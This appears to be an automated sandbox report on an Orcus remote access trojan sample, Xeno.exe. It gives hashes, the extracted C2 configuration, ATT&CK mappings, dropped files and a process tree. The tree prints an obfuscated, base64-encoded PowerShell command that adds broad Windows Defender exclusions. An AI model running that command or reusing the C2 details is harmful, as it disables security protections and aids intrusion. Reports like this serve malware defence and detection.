orcus | 03ddfb55de11308535056ec26e0fcf4fd3a8f3497274ecc6a084811e85dce6ed

Resubmissions

22-02-2025 17:08

250222-vnqjmsvkfk 10

22-02-2025 13:47

250222-q3skbsxkbx 10

Analysis

max time kernel
29s
max time network
40s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
22-02-2025 17:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Xeno.exe
Size

7.7MB
MD5

01383e336a68be85cbced91ad80e2507
SHA1

5a272b3de2d80f4336e2e1e4cadb4ee19ed552a8
SHA256

96a176e59cd65b922eb8bd1503e06eec372bf372fbd39928de593ab0c145a9fb
SHA512

0aff4d796da4285695eb1d01814da188aa6048e605e70a274c00ed6a83cd3ad6ba9426ec8fbaf83f3983c5a284d0e3dd301d266c91e40e34016b8507dce6a680
SSDEEP

196608:x1cxbidREuvpluneSAl+Vl5WV+SR49V3:x1cxWzEoluevl+Vl8V543

Score

10^/10

orcus defense_evasion discovery pyinstaller rat spyware stealer

Malware Config

Extracted

Family

orcus

dandev.us.to:10134

Mutex

fb6a52b489b9487e813d904c53c3e426

Attributes

autostart_method
Disable
enable_keylogger
false
install_path
%programfiles%\Orcus\Orcus.exe
reconnect_delay
10000
registry_keyname
Orcus
taskscheduler_taskname
Orcus
watchdog_path
AppData\OrcusWatchdog.exe

Signatures

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus
Orcus family
orcus

Orcus main payload 1 IoCs

resource	yara_rule
behavioral6/files/0x0007000000027ff4-61.dat	family_orcus

Orcurs Rat Executable 2 IoCs

resource	yara_rule
behavioral6/files/0x0007000000027ff4-61.dat	orcus
behavioral6/memory/2600-62-0x00000000005D0000-0x00000000006B8000-memory.dmp	orcus

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-80166876-2127584002-2233670790-1000\Control Panel\International\Geo\Nation	Xeno.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\law.exe	m56v9hcw.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\law.exe	m56v9hcw.exe

Executes dropped EXE 4 IoCs

pid	Process
2704	Xeno.exe
3088	m56v9hcw.exe
1004	m56v9hcw.exe
2600	law.exe

Loads dropped DLL 4 IoCs

pid	Process
1004	m56v9hcw.exe
1004	m56v9hcw.exe
1004	m56v9hcw.exe
1004	m56v9hcw.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral6/files/0x000a000000027d92-18.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Xeno.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	law.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1804	powershell.exe
1804	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	2600	law.exe
Token: SeIncreaseQuotaPrivilege	1804	powershell.exe
Token: SeSecurityPrivilege	1804	powershell.exe
Token: SeTakeOwnershipPrivilege	1804	powershell.exe
Token: SeLoadDriverPrivilege	1804	powershell.exe
Token: SeSystemProfilePrivilege	1804	powershell.exe
Token: SeSystemtimePrivilege	1804	powershell.exe
Token: SeProfSingleProcessPrivilege	1804	powershell.exe
Token: SeIncBasePriorityPrivilege	1804	powershell.exe
Token: SeCreatePagefilePrivilege	1804	powershell.exe
Token: SeBackupPrivilege	1804	powershell.exe
Token: SeRestorePrivilege	1804	powershell.exe
Token: SeShutdownPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeSystemEnvironmentPrivilege	1804	powershell.exe
Token: SeRemoteShutdownPrivilege	1804	powershell.exe
Token: SeUndockPrivilege	1804	powershell.exe
Token: SeManageVolumePrivilege	1804	powershell.exe
Token: 33	1804	powershell.exe
Token: 34	1804	powershell.exe
Token: 35	1804	powershell.exe
Token: 36	1804	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 324 wrote to memory of 1804	324	Xeno.exe	83
PID 324 wrote to memory of 1804	324	Xeno.exe	83
PID 324 wrote to memory of 1804	324	Xeno.exe	83
PID 324 wrote to memory of 2704	324	Xeno.exe	85
PID 324 wrote to memory of 2704	324	Xeno.exe	85
PID 324 wrote to memory of 3088	324	Xeno.exe	86
PID 324 wrote to memory of 3088	324	Xeno.exe	86
PID 3088 wrote to memory of 1004	3088	m56v9hcw.exe	87
PID 3088 wrote to memory of 1004	3088	m56v9hcw.exe	87
PID 1004 wrote to memory of 2600	1004	m56v9hcw.exe	88
PID 1004 wrote to memory of 2600	1004	m56v9hcw.exe	88
PID 1004 wrote to memory of 2600	1004	m56v9hcw.exe	88

C:\Users\Admin\AppData\Local\Temp\Xeno.exe
"C:\Users\Admin\AppData\Local\Temp\Xeno.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:324
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAegBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AZwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAZABkACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1804
- C:\Users\Admin\AppData\Roaming\Xeno.exe
  "C:\Users\Admin\AppData\Roaming\Xeno.exe"
  2⤵
  - Executes dropped EXE
  PID:2704
- C:\Users\Admin\AppData\Local\Temp\m56v9hcw.exe
  "C:\Users\Admin\AppData\Local\Temp\m56v9hcw.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3088
- - C:\Users\Admin\AppData\Local\Temp\m56v9hcw.exe
    "C:\Users\Admin\AppData\Local\Temp\m56v9hcw.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1004
  - - C:\Users\Admin\AppData\Local\Temp\_MEI30882\law.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI30882\law.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI30882\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\_bz2.pyd

Filesize
83KB

MD5
c17dcb7fc227601471a641ec90e6237f

SHA1
c93a8c2430e844f40f1d9c880aa74612409ffbb9

SHA256
55894b2b98d01f37b9a8cf4daf926d0161ff23c2fb31c56f9dbbac3a61932712

SHA512
38851cbd234a51394673a7514110eb43037b4e19d2a6fb79471cc7d01dbcf2695e70df4ba2727c69f1fed56fc7980e3ca37fddff73cc3294a2ea44facdeb0fa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\_decimal.pyd

Filesize
274KB

MD5
ad4324e5cc794d626ffccda544a5a833

SHA1
ef925e000383b6cad9361430fc38264540d434a5

SHA256
040f361f63204b55c17a100c260c7ddfadd00866cc055fbd641b83a6747547d5

SHA512
0a002b79418242112600b9246da66a5c04651aecb2e245f0220b2544d7b7df67a20139f45ddf2d4e7759ce8cc3d6b4be7f98b0a221c756449eb1b6d7af602325

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\_hashlib.pyd

Filesize
63KB

MD5
422e214ca76421e794b99f99a374b077

SHA1
58b24448ab889948303cdefe28a7c697687b7ebc

SHA256
78223aef72777efc93c739f5308a3fc5de28b7d10e6975b8947552a62592772b

SHA512
03fcccc5a300cc029bef06c601915fa38604d955995b127b5b121cb55fb81752a8a1eec4b1b263ba12c51538080335dabaef9e2b8259b4bf02af84a680552fa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\_lzma.pyd

Filesize
155KB

MD5
66a9028efd1bb12047dafce391fd6198

SHA1
e0b61ce28ea940f1f0d5247d40abe61ae2b91293

SHA256
e44dea262a24df69fd9b50b08d09ae6f8b051137ce0834640c977091a6f9fca8

SHA512
3c2a4e2539933cbeb1d0b3c8ef14f0563675fd53b6ef487c7a5371dfe2ee1932255f91db598a61aaadacd8dc2fe2486a91f586542c52dfc054b22ad843831d1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\_socket.pyd

Filesize
82KB

MD5
abf998769f3cba685e90fa06e0ec8326

SHA1
daa66047cf22b6be608127f8824e59b30c9026bf

SHA256
62d0493ced6ca33e2fd8141649dd9889c23b2e9afc5fdf56edb4f888c88fb823

SHA512
08c6b3573c596a15accf4936533567415198a0daab5b6e9824b820fd1f078233bbc3791fde6971489e70155f7c33c1242b0b0a3a17fe2ec95b9fadae555ed483

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\base_library.zip

Filesize
1.3MB

MD5
18c3f8bf07b4764d340df1d612d28fad

SHA1
fc0e09078527c13597c37dbea39551f72bbe9ae8

SHA256
6e30043dfa5faf9c31bd8fb71778e8e0701275b620696d29ad274846676b7175

SHA512
135b97cd0284424a269c964ed95b06d338814e5e7b2271b065e5eabf56a8af4a213d863dd2a1e93c1425fadb1b20e6c63ffa6e8984156928be4a9a2fbbfd5e93

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\law.exe

Filesize
903KB

MD5
80f316e9b42b99821182226e2b32887b

SHA1
92ae7497e977530dd697573772af62530ac54c1d

SHA256
63edaa4ba283705b25a0a22a2108e52a148d3978dec033da520320a096e02d7e

SHA512
23815b396a5a8f5fb9db7c497186311d3b365e66fb47bcf90c3b6dae4e5c87b3f50e46d6fa1a75204200f75b9707a84d809a05a19154ac5667b487153bc0b708

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\libcrypto-3.dll

Filesize
5.0MB

MD5
123ad0908c76ccba4789c084f7a6b8d0

SHA1
86de58289c8200ed8c1fc51d5f00e38e32c1aad5

SHA256
4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43

SHA512
80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\python313.dll

Filesize
5.8MB

MD5
3aad23292404a7038eb07ce5a6348256

SHA1
35cac5479699b28549ebe36c1d064bfb703f0857

SHA256
78b1dd211c0e66a0603df48da2c9b67a915ab3258701b9285d3faa255ed8dc25

SHA512
f5b6ef04e744d2c98c1ef9402d7a8ce5cda3b008837cf2c37a8b6d0cd1b188ca46585a40b2db7acf019f67e6ced59eff5bc86e1aaf48d3c3b62fecf37f3aec6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\select.pyd

Filesize
31KB

MD5
62fe3761d24b53d98cc9b0cbbd0feb7c

SHA1
317344c9edf2fcfa2b9bc248a18f6e6acedafffb

SHA256
81f124b01a85882e362a42e94a13c0eff2f4ccd72d461821dc5457a789554413

SHA512
a1d3da17937087af4e5980d908ed645d4ea1b5f3ebfab5c572417df064707cae1372b331c7096cc8e2e041db9315172806d3bc4bb425c6bb4d2fa55e00524881

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30882\unicodedata.pyd

Filesize
695KB

MD5
43b8b61debbc6dd93124a00ddd922d8c

SHA1
5dee63d250ac6233aac7e462eee65c5326224f01

SHA256
3f462ee6e7743a87e5791181936539642e3761c55de3de980a125f91fe21f123

SHA512
dd4791045cf887e6722feae4442c38e641f19ec994a8eaf7667e9df9ea84378d6d718caf3390f92443f6bbf39840c150121bb6fa896c4badd3f78f1ffe4de19d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nmef24m5.u3w.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\m56v9hcw.exe

Filesize
7.5MB

MD5
2b05de0510522c7ad36572eabc93c268

SHA1
3ecdf3df398138156d82b3706efdfb4318710fe4

SHA256
7ecd8b3a96f79a437837466c772cb384ae4fe1e9ab52b673611dbe55c2fe67a6

SHA512
e26d33bf757ac23427209aba85c2176faa218e43c6882551c6e3001f75424ab68adf6e54acb32e242b321a0ede5e28bf365ab50e4b9873f31c4dd7a6be590050

Download Submit
C:\Users\Admin\AppData\Roaming\Xeno.exe

Filesize
140KB

MD5
f0d6a8ef8299c5f15732a011d90b0be1

SHA1
5d2e6cc0bd4f1e810808f2a284f6c2a30b21edcf

SHA256
326bae0bd1398234dcef4c3d71f00e30cc9b447fa963e21d6f29605f42bb7e5b

SHA512
5b9f1517949a7fa9fdb7413146632d21a4208dc92823b673af85963ae5cc7f827b3ba27f3e9c5554c45e726ad159aac77d30306acc3559bd8712534e41ff0f27

Download Submit
memory/1804-102-0x0000000007920000-0x000000000792A000-memory.dmp

Filesize
40KB

Download
memory/1804-98-0x0000000006B20000-0x0000000006B3E000-memory.dmp

Filesize
120KB

Download
memory/1804-101-0x00000000078B0000-0x00000000078CA000-memory.dmp

Filesize
104KB

Download
memory/1804-67-0x0000000005F00000-0x0000000005F66000-memory.dmp

Filesize
408KB

Download
memory/1804-72-0x0000000005F70000-0x00000000062C7000-memory.dmp

Filesize
3.3MB

Download
memory/1804-66-0x0000000005E90000-0x0000000005EF6000-memory.dmp

Filesize
408KB

Download
memory/1804-65-0x00000000055F0000-0x0000000005612000-memory.dmp

Filesize
136KB

Download
memory/1804-100-0x0000000007F00000-0x000000000857A000-memory.dmp

Filesize
6.5MB

Download
memory/1804-99-0x0000000007750000-0x00000000077F3000-memory.dmp

Filesize
652KB

Download
memory/1804-87-0x0000000007710000-0x0000000007742000-memory.dmp

Filesize
200KB

Download
memory/1804-88-0x0000000070AB0000-0x0000000070AFC000-memory.dmp

Filesize
304KB

Download
memory/1804-103-0x0000000007B10000-0x0000000007BA6000-memory.dmp

Filesize
600KB

Download
memory/1804-84-0x0000000006540000-0x000000000655E000-memory.dmp

Filesize
120KB

Download
memory/1804-85-0x0000000006570000-0x00000000065BC000-memory.dmp

Filesize
304KB

Download
memory/1804-86-0x0000000073880000-0x0000000074031000-memory.dmp

Filesize
7.7MB

Download
memory/1804-54-0x0000000005650000-0x0000000005D1A000-memory.dmp

Filesize
6.8MB

Download
memory/1804-111-0x0000000073880000-0x0000000074031000-memory.dmp

Filesize
7.7MB

Download
memory/1804-55-0x0000000073880000-0x0000000074031000-memory.dmp

Filesize
7.7MB

Download
memory/1804-38-0x0000000004F40000-0x0000000004F76000-memory.dmp

Filesize
216KB

Download
memory/1804-22-0x000000007388E000-0x000000007388F000-memory.dmp

Filesize
4KB

Download
memory/2600-62-0x00000000005D0000-0x00000000006B8000-memory.dmp

Filesize
928KB

Download
memory/2600-80-0x00000000050E0000-0x00000000050F2000-memory.dmp

Filesize
72KB

Download
memory/2600-83-0x0000000006020000-0x000000000602A000-memory.dmp

Filesize
40KB

Download
memory/2600-82-0x00000000055E0000-0x00000000055F0000-memory.dmp

Filesize
64KB

Download
memory/2600-81-0x00000000055C0000-0x00000000055D8000-memory.dmp

Filesize
96KB

Download
memory/2600-68-0x0000000005610000-0x0000000005BB6000-memory.dmp

Filesize
5.6MB

Download
memory/2600-69-0x0000000005100000-0x0000000005192000-memory.dmp

Filesize
584KB

Download
memory/2600-64-0x0000000004F10000-0x0000000004F6C000-memory.dmp

Filesize
368KB

Download
memory/2600-104-0x0000000006E40000-0x0000000007458000-memory.dmp

Filesize
6.1MB

Download
memory/2600-105-0x0000000006850000-0x0000000006862000-memory.dmp

Filesize
72KB

Download
memory/2600-106-0x00000000068B0000-0x00000000068EC000-memory.dmp

Filesize
240KB

Download
memory/2600-107-0x0000000006A80000-0x0000000006B8A000-memory.dmp

Filesize
1.0MB

Download
memory/2600-108-0x0000000007460000-0x0000000007622000-memory.dmp

Filesize
1.8MB

Download
memory/2600-63-0x0000000002770000-0x000000000277E000-memory.dmp

Filesize
56KB

Download